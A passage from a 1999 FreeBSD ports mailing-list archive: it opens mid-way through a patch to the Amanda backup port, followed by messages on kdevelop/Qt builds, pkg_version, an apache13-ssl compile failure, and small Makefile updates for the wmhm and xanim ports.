"VOL1" is - written on the /dev/tape/1n device. - - .SH AUTHOR diff -urN /usr/ports/misc/amanda/patches/patch-ac misc/amanda/patches/patch-ac --- /usr/ports/misc/amanda/patches/patch-ac Sat Mar 8 00:00:00 1997 +++ misc/amanda/patches/patch-ac Fri Dec 3 00:30:53 1999 @@ -1,13 +1,13 @@ -*** config/options.h-vanilla Fri Feb 10 11:21:59 1995 ---- config/options.h Tue Feb 28 16:34:30 1995 +*** config/options.h-vanilla.orig Mon May 20 11:11:25 1996 +--- config/options.h-vanilla Fri Dec 3 00:29:56 1999 *************** *** 42,51 **** * LIBEXEC_DIR - Internal support programs * MAN_DIR - Man pages */ ! #define CONFIG_DIR "/etc/amanda" - #define LIBEXEC_DIR "/usr/local/libexec/amanda" - #define BIN_DIR "/usr/local/sbin" +! #define LIBEXEC_DIR "/usr/local/libexec/amanda" +! #define BIN_DIR "/usr/local/sbin" ! #define MAN_DIR "/usr/share/local/man/man8" @@ -16,10 +16,43 @@ * LIBEXEC_DIR - Internal support programs * MAN_DIR - Man pages */ -! #define CONFIG_DIR "/usr/local/etc/amanda" - #define LIBEXEC_DIR "/usr/local/libexec/amanda" - #define BIN_DIR "/usr/local/sbin" -! #define MAN_DIR "/usr/local/man/man8" +! #define CONFIG_DIR "%%PREFIX%%/etc/amanda" +! #define LIBEXEC_DIR "%%PREFIX%%/libexec/amanda" +! #define BIN_DIR "%%PREFIX%%/sbin" +! #define MAN_DIR "%%PREFIX%%/man/man8" + + + /* +*************** +*** 53,66 **** + * I compile with -g to compile in a full symbol table, but you might choose + * to use -O or something else. + */ +! #define MK_CCOPTS -g + /* + * You can also redefine MK_CC here if you wish to override the system + * dependent C compiler. If you have a stable version of GCC, you may + * well want to use that instead of the system compiler. + */ +! /* #undef MK_CC */ +! /* #define MK_CC gcc -Wall */ + + + /* +--- 53,68 ---- + * I compile with -g to compile in a full symbol table, but you might choose + * to use -O or something else. + */ +! #define MK_CCOPTS %%CFLAGS%% + /* + * You can also redefine MK_CC here if you wish to override the system + * dependent C compiler. If you have a stable version of GCC, you may + * well want to use that instead of the system compiler. + */ +! #undef MK_INSTALL +! #define MK_INSTALL %%INSTALL%% +! #undef MK_CC +! #define MK_CC %%CC%% /* @@ -32,7 +65,7 @@ /* ---- 77,83 ---- +--- 79,85 ---- * Since 2.2.1 is a major change, I recommend defining this for existing * Amanda sites. */ @@ -41,7 +74,7 @@ /* *************** -*** 182,196 **** +*** 182,198 **** #define HAVE_GZIP #ifdef HAVE_GZIP @@ -57,7 +90,9 @@ # define COMPRESS_BEST_OPT "-f" /* it's just a placeholder */ ! # define UNCOMPRESS_CMD "zcat" #endif ---- 182,196 ---- + + /* +--- 184,200 ---- #define HAVE_GZIP #ifdef HAVE_GZIP @@ -73,3 +108,5 @@ # define COMPRESS_BEST_OPT "-f" /* it's just a placeholder */ ! # define UNCOMPRESS_CMD "/usr/bin/zcat" #endif + + /* diff -urN /usr/ports/misc/amanda/patches/patch-ad misc/amanda/patches/patch-ad --- /usr/ports/misc/amanda/patches/patch-ad Thu Jan 1 09:00:00 1970 +++ misc/amanda/patches/patch-ad Wed Dec 1 04:07:03 1999 @@ -0,0 +1,27 @@ +--- man/amanda.8.orig Mon May 20 11:11:25 1996 ++++ man/amanda.8 Wed Dec 1 03:59:02 1999 +@@ -135,19 +135,19 @@ + + All the files are stored in a + .I config +-directory under /etc/amanda. Often a single site will have more than ++directory under %%PREFIX%%/etc/amanda. Often a single site will have more than + one configuration; these configurations are named by the directories + that their config files are in. For example, a site might have a + .I normal + configuration for every-day backups, and a + .I archive + configuration for 6-month full archival backups. The config files for +-these two would be stored under /etc/amanda/normal and +-/etc/amanda/archive, respectively. ++these two would be stored under %%PREFIX%%/etc/amanda/normal and ++%%PREFIX%%/etc/amanda/archive, respectively. + + All log and database files generated by Amanda go in corresponding +-directories under /usr/adm/amanda. In our example, the logs would go +-in /usr/adm/amanda/normal and /usr/adm/amanda/archive. ++directories under /var/log/amanda. In our example, the logs would go ++in /var/log/amanda/normal and /var/log/amanda/archive. + + .SH CONFIG FILE PARAMETERS + diff -urN /usr/ports/misc/amanda/patches/patch-ae misc/amanda/patches/patch-ae --- /usr/ports/misc/amanda/patches/patch-ae Thu Jan 1 09:00:00 1970 +++ misc/amanda/patches/patch-ae Wed Dec 1 04:22:14 1999 @@ -0,0 +1,19 @@ +--- man/amcleanup.8.orig Mon May 20 11:11:25 1996 ++++ man/amcleanup.8 Wed Dec 1 04:22:03 1999 +@@ -31,13 +31,13 @@ + + .PP + .nf +-if [ -s /usr/adm/amanda/csd/amanda.log ] ++if [ -s /var/log/amanda/csd/amanda.log ] + then +- /usr/local/sbin/amcleanup csd ++ %%PREFIX%%/sbin/amcleanup csd + fi + .fi + .RS .5i +-Putting the above in /etc/rc.local runs the Amanda ++Putting the above in %%PREFIX%%/rc.local runs the Amanda + cleanup process when needed as part of the reboot, eliminating the need + to run it by hand. + .RE diff -urN /usr/ports/misc/amanda/patches/patch-af misc/amanda/patches/patch-af --- /usr/ports/misc/amanda/patches/patch-af Thu Jan 1 09:00:00 1970 +++ misc/amanda/patches/patch-af Wed Dec 1 04:06:04 1999 @@ -0,0 +1,11 @@ +--- man/amflush.8.orig Mon May 20 11:11:25 1996 ++++ man/amflush.8 Wed Dec 1 03:59:02 1999 +@@ -22,7 +22,7 @@ + .B Amflush + will look in the holding disk specified by the + .I amanda.conf +-file in /etc/amanda/\fIconfig\fR ++file in %%PREFIX%%/etc/amanda/\fIconfig\fR + for any non-empty Amanda work directories. It then prompts the + operator to select the correct directory. The work directories on the + holding disk are named by the date at the time diff -urN /usr/ports/misc/amanda/patches/patch-ag misc/amanda/patches/patch-ag --- /usr/ports/misc/amanda/patches/patch-ag Thu Jan 1 09:00:00 1970 +++ misc/amanda/patches/patch-ag Wed Dec 1 04:06:04 1999 @@ -0,0 +1,20 @@ +--- man/amlabel.8.orig Mon May 20 11:11:25 1996 ++++ man/amlabel.8 Wed Dec 1 03:59:02 1999 +@@ -11,7 +11,7 @@ + .B Amlabel + writes an Amanda label on the tape in the tape drive specified by the + .I amanda.conf +-file in /etc/amanda/\fIconfig\fR. The ++file in %%PREFIX%%/etc/amanda/\fIconfig\fR. The + .I label + can be any string that does not contain whitespace, and that matches the + .I amanda.conf +@@ -26,7 +26,7 @@ + .TP + % amlabel csd VOL1 + If the line "tapedev /dev/tape/1n" is in +-/etc/amanda/csd/amanda.conf, an Amanda label with the name "VOL1" is ++%%PREFIX%%/etc/amanda/csd/amanda.conf, an Amanda label with the name "VOL1" is + written on the /dev/tape/1n device. + + .SH AUTHOR diff -urN /usr/ports/misc/amanda/pkg/DESCR misc/amanda/pkg/DESCR --- /usr/ports/misc/amanda/pkg/DESCR Wed Nov 10 21:12:29 1999 +++ misc/amanda/pkg/DESCR Wed Dec 1 03:34:10 1999 @@ -1,3 +1,5 @@ This is the Advanced Maryland Automatic Network Disk Archiver. Amanda is a backup system designed to archive many computers on a network to a single large-capacity tape drive. + +WWW: http://www.cs.umd.edu/projects/amanda/ diff -urN /usr/ports/misc/amanda/pkg/PLIST misc/amanda/pkg/PLIST --- /usr/ports/misc/amanda/pkg/PLIST Mon Oct 5 10:18:00 1998 +++ misc/amanda/pkg/PLIST Thu Dec 2 23:49:17 1999 @@ -1,27 +1,27 @@ libexec/amanda/amandad -libexec/amanda/sendsize libexec/amanda/calcsize -libexec/amanda/sendbackup-dump -libexec/amanda/sendbackup-gnutar -libexec/amanda/runtar -libexec/amanda/selfcheck -libexec/amanda/taper -libexec/amanda/dumper +libexec/amanda/chg-generic libexec/amanda/driver +libexec/amanda/dumper +libexec/amanda/getconf libexec/amanda/planner libexec/amanda/reporter -libexec/amanda/getconf -libexec/amanda/chg-generic -sbin/amrestore +libexec/amanda/runtar +libexec/amanda/selfcheck +libexec/amanda/sendbackup-dump +libexec/amanda/sendbackup-gnutar +libexec/amanda/sendsize +libexec/amanda/taper sbin/amadmin -sbin/amflush -sbin/amlabel sbin/amcheck -sbin/amdump sbin/amcleanup +sbin/amdump +sbin/amflush +sbin/amlabel +sbin/amrestore sbin/amtape share/examples/amanda/amanda.conf share/examples/amanda/chg-generic.conf share/examples/amanda/disklist -@dirrm libexec/amanda @dirrm share/examples/amanda +@dirrm libexec/amanda diff -urN /usr/ports/misc/amanda/scripts/configure misc/amanda/scripts/configure --- /usr/ports/misc/amanda/scripts/configure Sat Mar 8 00:00:00 1997 +++ misc/amanda/scripts/configure Thu Jan 1 09:00:00 1970 @@ -1,8 +0,0 @@ -#!/bin/sh - -CFLAGS=`cat /tmp/build-ports-misc-amanda-cflags` -rm /tmp/build-ports-misc-amanda-cflags -echo $CFLAGS - -mv $WRKSRC/config/config.h-freebsd2 $WRKSRC/config/config.h -sed "s/#define MK_CCOPTS -g/#define MK_CCOPTS $CFLAGS/" < $WRKSRC/config/options.h-vanilla > $WRKSRC/config/options.h >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Thu Dec 2 11: 1:27 1999 Delivered-To: freebsd-ports@freebsd.org Received: from mail.af.airnet.ne.jp (mail.af.airnet.ne.jp [210.159.66.49]) by hub.freebsd.org (Postfix) with ESMTP id 9E30C14C31 for ; Thu, 2 Dec 1999 11:01:23 -0800 (PST) (envelope-from imura@cs.titech.ac.jp) Received: from imura.cs.titech.ac.jp (tok231.airnet.ne.jp [210.159.88.231]) by mail.af.airnet.ne.jp (8.8.8/3.6W/06/13/98-AF.AIRNET.NE.JP) with ESMTP id EAA16604; Fri, 3 Dec 1999 04:01:01 +0900 Posted-Date: Fri, 3 Dec 1999 04:00:44 +0900 (JST) To: andrews@technologist.com Cc: ports@FreeBSD.ORG, mlobo@nlink.com.br, kdevelop@barney.cs.uni-potsdam.de Subject: RE: Problem on making kdevelop 1.0beta4.1 From: "R. Imura" In-Reply-To: References: <19991202033454E.imura@cs.titech.ac.jp> X-Mailer: Mew version 1.94b20 on Emacs 19.34 / Mule 2.3 =?iso-2022-jp?B?KBskQkt2RSYyVhsoQik=?= X-Prom-Mew: Prom-Mew 1.93.4 (procmail reader for Mew) Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit Message-Id: <19991203040043I.imura@cs.titech.ac.jp> Date: Fri, 03 Dec 1999 04:00:43 +0900 X-Dispatcher: imput version 990401(IM113) Lines: 26 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > "obsolete", not "obsoluted". # Oops. Thanks. :) > Why do it this way? We'll have to add this in for ALL the ports that are based > on kde/qt USE_NEWGCC! And then when somebody _FINALLY_ decides to add it to > those ports.. I agree with your idea. But there are about 50 ports having USE_QT=yes (32 ports at FreeBSD-2.2.8) and you have to change all of the ports at the same time. In addition, many people will complain to us while a few weeks after the change for the incompatibility, and we have to say "Please update all of your qt ports" every time. I only worry about it. > You could send me yours so I can fix my "normal kde" version. :-) > > Or is it available on that URL you posted? Is it ok? (japanese mail + uuencode) http://home.jp.FreeBSD.org/cgi-bin/showmail/ports-jp/8285 --- R. Imura To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Thu Dec 2 13:22:40 1999 Delivered-To: freebsd-ports@freebsd.org Received: from nimitz.ca.sandia.gov (nimitz.ca.sandia.gov [146.246.243.56]) by hub.freebsd.org (Postfix) with ESMTP id A53E314F24 for ; Thu, 2 Dec 1999 13:22:31 -0800 (PST) (envelope-from bmah@nimitz.ca.sandia.gov) Received: (from bmah@localhost) by nimitz.ca.sandia.gov (8.9.3/8.9.3) id NAA19266; Thu, 2 Dec 1999 13:22:11 -0800 (PST) Message-Id: <199912022122.NAA19266@nimitz.ca.sandia.gov> X-Mailer: exmh version 2.1.0 09/18/1999 To: Bill Fumerola Cc: "Bruce A. Mah" , ports@FreeBSD.ORG Subject: Re: pkg_version (was Re: FreeBSD Port: mergemaster-1.36) In-Reply-To: Your message of "Thu, 04 Nov 1999 19:12:17 EST." From: bmah@CA.Sandia.GOV (Bruce A. Mah) Reply-To: bmah@CA.Sandia.GOV X-Face: g~c`.{#4q0"(V*b#g[i~rXgm*w;:nMfz%_RZLma)UgGN&=j`5vXoU^@n5v4:OO)c["!w)nD/!!~e4Sj7LiT'6*wZ83454H""lb{CC%T37O!!'S$S&D}sem7I[A 2V%N&+ X-Url: http://www.ca.sandia.gov/~bmah/ Mime-Version: 1.0 Content-Type: multipart/signed; boundary="==_Exmh_1888542974P"; micalg=pgp-sha1; protocol="application/pgp-signature" Content-Transfer-Encoding: 7bit Date: Thu, 02 Dec 1999 13:22:11 -0800 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --==_Exmh_1888542974P Content-Type: text/plain; charset=us-ascii If memory serves me right, Bill Fumerola wrote: > On Thu, 4 Nov 1999, Bruce A. Mah wrote: > > > Speaking of ports moving into the base system...a gentle reminder about > > bringing pkg_version into -STABLE...???... > > Oy. I'll try to look into that this weekend. Hi Bill-- I'm aware we're probably past the code slush deadline, pre-3.4, but I thought I'd ping you on this again. Thanks! Bruce. --==_Exmh_1888542974P Content-Type: application/pgp-signature -----BEGIN PGP SIGNATURE----- Version: PGPfreeware 5.0i for non-commercial use MessageID: dsTyQkpkn6JW2OjdRZA5eUgm6Taown1K iQA/AwUBOEbjA9jKMXFboFLDEQLeEgCg9fkACLHD+qWus8S6X4P+3KC5EFsAoNKd AlOsCO8UmpwrPj5ru3JYQlgE =s9GX -----END PGP SIGNATURE----- --==_Exmh_1888542974P-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Thu Dec 2 14:34:11 1999 Delivered-To: freebsd-ports@freebsd.org Received: from nhj.nlc.net.au (nhj.nlc.net.au [203.24.133.1]) by hub.freebsd.org (Postfix) with SMTP id 6934114C4A for ; Thu, 2 Dec 1999 14:33:58 -0800 (PST) (envelope-from john@nlc.net.au) Received: (qmail 4412 invoked from network); 3 Dec 1999 09:33:43 +1100 Received: from pacer.nlc.net.au (203.24.133.16) by nhj.nlc.net.au with SMTP; 3 Dec 1999 09:33:43 +1100 Received: (qmail 76042 invoked from network); 2 Dec 1999 22:33:40 -0000 Received: from localhost.nlc.net.au (HELO nlc.net.au) (john@127.0.0.1) by localhost.nlc.net.au with SMTP; 2 Dec 1999 22:33:40 -0000 Message-ID: <3846F3C4.238A7EA6@nlc.net.au> Date: Fri, 03 Dec 1999 09:33:40 +1100 From: John Saunders Organization: NORTHLINK COMMUNICATIONS PTY LTD X-Mailer: Mozilla 4.61 [en] (X11; U; FreeBSD 4.0-CURRENT i386) X-Accept-Language: en MIME-Version: 1.0 To: freebsd-ports@freebsd.org Subject: Re: apache13-ssl failing? References: <38461801.897BA997@sasknow.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org apache+mod_ssl-1.3.9+2.4.9 builds fine with the new GCC. It is also config file compatible (or mostly so) with ApacheSSL. It's worth a shot if the other one has remained broken for so long. Having spent some time with both SSL offerings, I would reccomend mod_ssl over ApacheSSL any day. For the SSL novice I would say mod_ssl is an absolute must, no choice involved, due to the supplied documentation. From a software egineering POV it integrates in a nicer fashion with Apache. It consists of a small simple patch which provides an enhanced module API, then the SSL code sits in a real Apache module. "Ryan Thompson [FreeBSD]" wrote: > > Yes, I posted a message here a few days ago. I had the same problem > with 11/24's stable. Hasn't been resolved, yet, afaik. > > Jon Rust wrote: > > > > Latest port of apache13-ssl appears to fail at compile. Anyone else? > > > > ===> Configuring for apache+ssl-1.3.9+1.37 > > Configuring for Apache, Version 1.3.9 Ben-SSL/1.37 > > 1.3.9 > > + using installation path layout: GNU (config.layout) > > Creating Makefile > > Creating Configuration.apaci in src > > + enabling mod_so for DSO support > > Creating Makefile in src > > + configured for FreeBSD 3.3 platform > > + setting C pre-processor to cc -E > > + checking for system header files > > + using custom target name: httpsd > > + adding selected modules > > o rewrite_module uses ConfigStart/End > > enabling DBM support for mod_rewrite > > o db_auth_module uses ConfigStart/End > > using Berkeley-DB/1.x for mod_auth_db (-lc) > > + checking sizeof various data types > > + doing sanity check on compiler and options > > ** A test compilation with your Makefile configuration > > ** failed. This is most likely because your C compiler > > ** is not ANSI. Apache requires an ANSI C Compiler, such > > ** as gcc. The above error message from your compiler > > ** will also provide a clue. > > Aborting! > > ===> Building for apache+ssl-1.3.9+1.37 > > ===> src > > make: don't know how to make all. Stop > > *** Error code 2 > > > > Stop. > > *** Error code 1 > > > > Stop. > > *** Error code 1 > > > > Stop. > > *** Error code 1 > > > > Stop. > > *** Error code 1 > > > > Stop. > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-questions" in the body of the message > > -- > > Ryan Thompson > 50% Owner, Technical and Accounts > Phone: +1 (306) 664-1161 > > SaskNow Technologies http://www.sasknow.com > #106-380 3120 8th St E Saskatoon, SK S7H 0W2 > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-questions" in the body of the message -- +------------------------------------------------------------+ . | John Saunders - mailto:john@nlc.net.au (EMail) | ,--_|\ | - http://www.nlc.net.au/ (WWW) | / Oz \ | - 02-9489-4932 or 04-1822-3814 (Phone) | \_,--\_/ | NORTHLINK COMMUNICATIONS P/L - Supplying a professional, | v | and above all friendly, internet connection service. | +------------------------------------------------------------+ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Thu Dec 2 15: 3:40 1999 Delivered-To: freebsd-ports@freebsd.org Received: from jade.chc-chimes.com (jade.chc-chimes.com [216.28.46.6]) by hub.freebsd.org (Postfix) with ESMTP id F0F6014FD8 for ; Thu, 2 Dec 1999 15:03:37 -0800 (PST) (envelope-from billf@chc-chimes.com) Received: by jade.chc-chimes.com (Postfix, from userid 1001) id 052501C57; Thu, 2 Dec 1999 17:04:36 -0500 (EST) Received: from localhost (localhost [127.0.0.1]) by jade.chc-chimes.com (Postfix) with ESMTP id 01965381B; Thu, 2 Dec 1999 17:04:35 -0500 (EST) Date: Thu, 2 Dec 1999 17:04:35 -0500 (EST) From: Bill Fumerola To: "Bruce A. Mah" Cc: "Bruce A. Mah" , ports@FreeBSD.ORG Subject: Re: pkg_version (was Re: FreeBSD Port: mergemaster-1.36) In-Reply-To: <199912022122.NAA19266@nimitz.ca.sandia.gov> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, 2 Dec 1999, Bruce A. Mah wrote: > I'm aware we're probably past the code slush deadline, pre-3.4, but I > thought I'd ping you on this again. It's already in the system and merged. There is a PR that has some suggested patches for it, you should look at them and get back to me on them. thanks, -- - bill fumerola - billf@chc-chimes.com - BF1560 - computer horizons corp - - ph:(800) 252-2421 - bfumerol@computerhorizons.com - billf@FreeBSD.org - To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Thu Dec 2 15:20:27 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 0E57014FFA for ; Thu, 2 Dec 1999 15:20:23 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id PAA50095; Thu, 2 Dec 1999 15:20:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from pyros.dhis.org (p31-max2.dun.ihug.co.nz [209.76.100.94]) by hub.freebsd.org (Postfix) with ESMTP id A7D5214D07 for ; Thu, 2 Dec 1999 15:15:45 -0800 (PST) (envelope-from mmuir@pyros.dhis.org) Received: (from root@localhost) by pyros.dhis.org (8.9.3/8.9.3) id MAA02461; Fri, 3 Dec 1999 12:15:35 +1300 (NZDT) (envelope-from mmuir) Message-Id: <199912022315.MAA02461@pyros.dhis.org> Date: Fri, 3 Dec 1999 12:15:35 +1300 (NZDT) From: mmuir@es.co.nz Reply-To: mmuir@es.co.nz To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: ports/15232: update port: sysutils/wmhm Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15232 >Category: ports >Synopsis: update port: sysutils/wmhm >Confidential: no >Severity: non-critical >Priority: medium >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Thu Dec 2 15:20:02 PST 1999 >Closed-Date: >Last-Modified: >Originator: Mike Muir >Release: FreeBSD 4.0-CURRENT i386 >Organization: >Environment: n/a >Description: Just changed the FTP address to mongol.dhis.net, as dhis changed to .net recently.. >How-To-Repeat: >Fix: diff -ruN /usr/ports/sysutils/wmhm/Makefile ./wmhm/Makefile --- /usr/ports/sysutils/wmhm/Makefile Sat Nov 13 22:32:27 1999 +++ ./wmhm/Makefile Fri Dec 3 11:52:39 1999 @@ -3,12 +3,12 @@ # Date created: 21 September 1999 # Whom: Mike Muir # -# $FreeBSD: ports/sysutils/wmhm/Makefile,v 1.7 1999/11/12 20:38:34 jim Exp $ +# $FreeBSD$ # DISTNAME= wmhm-1.3 CATEGORIES= sysutils windowmaker -MASTER_SITES= ftp://mongol.dhis.org/pub/wmhm/ \ +MASTER_SITES= ftp://mongol.dhis.net/pub/wmhm/ \ http://www.es.co.nz/~mmuir/ MAINTAINER= mmuir@es.co.nz >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Thu Dec 2 15:52:33 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 998EC14A05 for ; Thu, 2 Dec 1999 15:52:26 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id PAA52099; Thu, 2 Dec 1999 15:50:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from pawn.primelocation.net (pawn.primelocation.net [205.161.238.235]) by hub.freebsd.org (Postfix) with ESMTP id C9C5114A05 for ; Thu, 2 Dec 1999 15:46:48 -0800 (PST) (envelope-from jedgar@pawn.primelocation.net) Received: by pawn.primelocation.net (Postfix, from userid 1003) id 206F79B37; Thu, 2 Dec 1999 18:45:54 -0500 (EST) Message-Id: <19991202234554.206F79B37@pawn.primelocation.net> Date: Thu, 2 Dec 1999 18:45:54 -0500 (EST) From: jedgar@fxp.org Reply-To: jedgar@fxp.org To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: ports/15233: Update port: graphics/xanim Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15233 >Category: ports >Synopsis: Update port: graphics/xanim >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Thu Dec 2 15:50:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: Chris D. Faulhaber >Release: FreeBSD 4.0-CURRENT i386 >Organization: BUGO - BSD Users Group of Orlando >Environment: FreeBSD 4.0-CURRENT i386 >Description: Update port: graphics/xanim * Correct man page entry in Makefile Noticed by: bento >How-To-Repeat: >Fix: Index: Makefile =================================================================== RCS file: /home/ncvs/ports/graphics/xanim/Makefile,v retrieving revision 1.22 diff -u -r1.22 Makefile --- Makefile 1999/11/26 18:39:24 1.22 +++ Makefile 1999/12/02 23:44:12 @@ -23,8 +23,7 @@ vid_iv41_1.1_freebsdELFx86.tgz \ vid_iv50_1.0_freebsdELFx86.tgz USE_IMAKE= yes -MANN= xanim.n -MANCOMPRESSED= no +MAN1= xanim.1 DLLDIR= ${PREFIX}/lib/X11/xanim >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Thu Dec 2 17: 1: 7 1999 Delivered-To: freebsd-ports@freebsd.org Received: from norn.ca.eu.org (cr965240-b.abtsfd1.bc.wave.home.com [24.113.19.137]) by hub.freebsd.org (Postfix) with ESMTP id 58C9A14ED4 for ; Thu, 2 Dec 1999 17:01:04 -0800 (PST) (envelope-from cpiazza@norn.ca.eu.org) Received: by norn.ca.eu.org (Postfix, from userid 1000) id C42E7112; Thu, 2 Dec 1999 17:00:54 -0800 (PST) Date: Thu, 2 Dec 1999 17:00:54 -0800 From: Chris Piazza To: Anders Andersson Cc: ports@FreeBSD.ORG Subject: Re: epic4 port Message-ID: <19991202170054.A5709@norn.ca.eu.org> References: <19991202132115.A45286@enterprise.sanyusan.se> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0i In-Reply-To: <19991202132115.A45286@enterprise.sanyusan.se>; from anders@sanyusan.se on Thu, Dec 02, 1999 at 01:21:15PM +0100 X-Operating-System: FreeBSD 4.0-CURRENT i386 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, Dec 02, 1999 at 01:21:15PM +0100, Anders Andersson wrote: > I am the new maintainer of the irc/epic4 port. > > I would like to request a repo copy from epic4 to epic. Now this is > possible since epic3 is gone from the ports tree and epic4 will soon > become a 1.0 application. > > What is the procedure for this? Usually you'd just note that the port needs to move and the committer who handles the upgrade will ask asami to repo copy it before they commit. -Chris -- cpiazza@jaxon.net cpiazza@FreeBSD.org Abbotsford, BC, Canada To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Thu Dec 2 17:18:52 1999 Delivered-To: freebsd-ports@freebsd.org Received: from nimitz.ca.sandia.gov (nimitz.ca.sandia.gov [146.246.243.56]) by hub.freebsd.org (Postfix) with ESMTP id C63A014ECC for ; Thu, 2 Dec 1999 17:18:49 -0800 (PST) (envelope-from bmah@nimitz.ca.sandia.gov) Received: (from bmah@localhost) by nimitz.ca.sandia.gov (8.9.3/8.9.3) id RAA21714; Thu, 2 Dec 1999 17:18:25 -0800 (PST) Message-Id: <199912030118.RAA21714@nimitz.ca.sandia.gov> X-Mailer: exmh version 2.1.0 09/18/1999 To: Bill Fumerola Cc: "Bruce A. Mah" , ports@FreeBSD.ORG Subject: Re: pkg_version (was Re: FreeBSD Port: mergemaster-1.36) In-Reply-To: Your message of "Thu, 02 Dec 1999 17:04:35 EST." From: bmah@CA.Sandia.GOV (Bruce A. Mah) Reply-To: bmah@CA.Sandia.GOV X-Face: g~c`.{#4q0"(V*b#g[i~rXgm*w;:nMfz%_RZLma)UgGN&=j`5vXoU^@n5v4:OO)c["!w)nD/!!~e4Sj7LiT'6*wZ83454H""lb{CC%T37O!!'S$S&D}sem7I[A 2V%N&+ X-Url: http://www.ca.sandia.gov/~bmah/ Mime-Version: 1.0 Content-Type: multipart/signed; boundary="==_Exmh_-272409156P"; micalg=pgp-sha1; protocol="application/pgp-signature" Content-Transfer-Encoding: 7bit Date: Thu, 02 Dec 1999 17:18:25 -0800 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --==_Exmh_-272409156P Content-Type: text/plain; charset=us-ascii If memory serves me right, Bill Fumerola wrote: > > I'm aware we're probably past the code slush deadline, pre-3.4, but I > > thought I'd ping you on this again. > > It's already in the system and merged. There is a PR that has > some suggested patches for it, you should look at them and > get back to me on them. Oops. Apparently I didn't understand where pkg_version fit into the source tree, but I found it. If you mean PR bin/15162 from dom@palmerharvey.co.uk, I just pulled it down and tested it. Looks good to me, except that we should also add him to the Contributors section of the manpage. I recommend adopting the patch and closing the PR. Also in the Makefile, my email address is not bmah@CS.Sandia.GOV but bmah@CA.Sandia.GOV. (It's a common mistake, and I made it for months.) ^^ Thanks! Bruce. PS. I owe apologies to Nik Clayton, Dave Glowacki, Neil Blakey-Milner, Stefan `Sec` Zehl, and possibly other people, for dropping their pkg_version patches on the floor. Dave, Neil, and Stefan all have different ways to fix the "match multiple versions of packages" problem. I ought to figure out which parts of these should get patched in, but I seem to have even less free hacking time now than I did when I was ignoring their patches. :-p --==_Exmh_-272409156P Content-Type: application/pgp-signature -----BEGIN PGP SIGNATURE----- Version: PGPfreeware 5.0i for non-commercial use MessageID: x0o0T8IdGwRMXKFr5eclTmDAmTqcBNXb iQA/AwUBOEcaYdjKMXFboFLDEQKGigCfaK6WuJ0a9Je5HgAN+t0XBW7t3E8AoLtX wakdwJ+KdWCXF8/TRwE4cmzn =GW/T -----END PGP SIGNATURE----- --==_Exmh_-272409156P-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Thu Dec 2 21: 0:14 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 736B315046 for ; Thu, 2 Dec 1999 21:00:06 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id VAA04575; Thu, 2 Dec 1999 21:00:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Date: Thu, 2 Dec 1999 21:00:02 -0800 (PST) Message-Id: 